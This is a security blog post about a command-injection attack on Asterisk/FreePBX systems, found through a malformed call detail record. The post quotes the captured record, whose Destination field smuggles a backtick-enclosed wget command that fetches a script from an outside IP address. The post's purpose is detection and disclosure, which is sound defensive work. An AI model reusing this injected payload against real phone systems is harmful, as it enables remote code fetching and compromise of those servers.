Asterisk Hack Pattern

* 20 Sep – Updated information available here *

The amount of data collected by the Humbug platform is sometimes mind boggling. With over 5000 connected PBX systems and over 4 million events on a daily basis – the amount of information stored can be overwhelming at start. As with any type of system that collects information at such rates, you sometimes need to step back and look at the data from a fresh point of view – and at some brief moments of clarity, a new pattern emerges and sheds new light on your accumulated data.
Recently, we’ve discovered a brand new type of Hack Pattern, that relates directly to Asterisk – specifically, a way to hack your FreePBX installation and gain privileges to access it. The hack was discovered due to a CDR record that had caused an issue with one of our collector servers. The CDR was formatted as following:

{“api”:”XXXXXXXXX”,”customer”:”XXX”,
“key”:”XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX”,
“Event”:”Cdr”,”Privilege”:”call,all”,”AccountCode”:”",”Source”:”unknown”,
“Destination”:”00123456789000`wget\\x20-O\\x20\/dev\/null\\x20http:\/\/91.223.89.94\/V.php`”,”DestinationContext”:”default”,”CallerID”:”unknown unknown”,”Channel”:”SIP\/5060-1f92b7b8″,
“DestinationChannel”:”",”LastApplication”:”Record”,
“LastData”:”\/usr\/share\/arcade-project\/recordings\/arcade%d:wav”,
“StartTime”:”2011-09-10 20:35:17″,”AnswerTime”:”2011-XX-XX 20:35:18″,
“EndTime”:”2011-XX-XX 00:35:38″,”Duration”:”21″,”BillableSeconds”:”20″,
“Disposition”:”ANSWERED”,”AMAFlags”:”DOCUMENTATION”,
“UniqueID”:”1315701317.272918″,”UserField”:”",
“gateway”:”XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX”,
“event_time”:”"}

Yes, that is not your normal presentation of a CDR, it’s a JSON encoded CDR structure, according to how we analyze and store it. Putting that aside, take a look at the bolded fields. Apparently, our hacker had stipulated that by generating a call to a destination that may have a back-tick operator, that would cause Asterisk to issue the “wget” command that in enclosed in the “Destination”. We tried obtaining the fairly suspicious V.php script (http://91.223.89.94/V.php), however, the server was no longer available. The server that is supposedly the origin of the V.php script is located somewhere in Vladivastok, so our assumption is that it is located on a hacked server, the IP number belongs to a Class-C network assigned to a single company – in other words, a hacked machine somewhere on the net.

Since the discovery of this pattern, we had noticed this pattern appearing on some other PBX systems connected to our systems and the respective users had been notified as well. We are now including the pattern into our fraud analysis engine, so it will be able to alert on this issue. We are still analyzing the data that was discovered and are fairly excited about what we found. This discovery is a significant mile-stone for us, as we are now confident with our ability to identify new patterns at a rapid pace.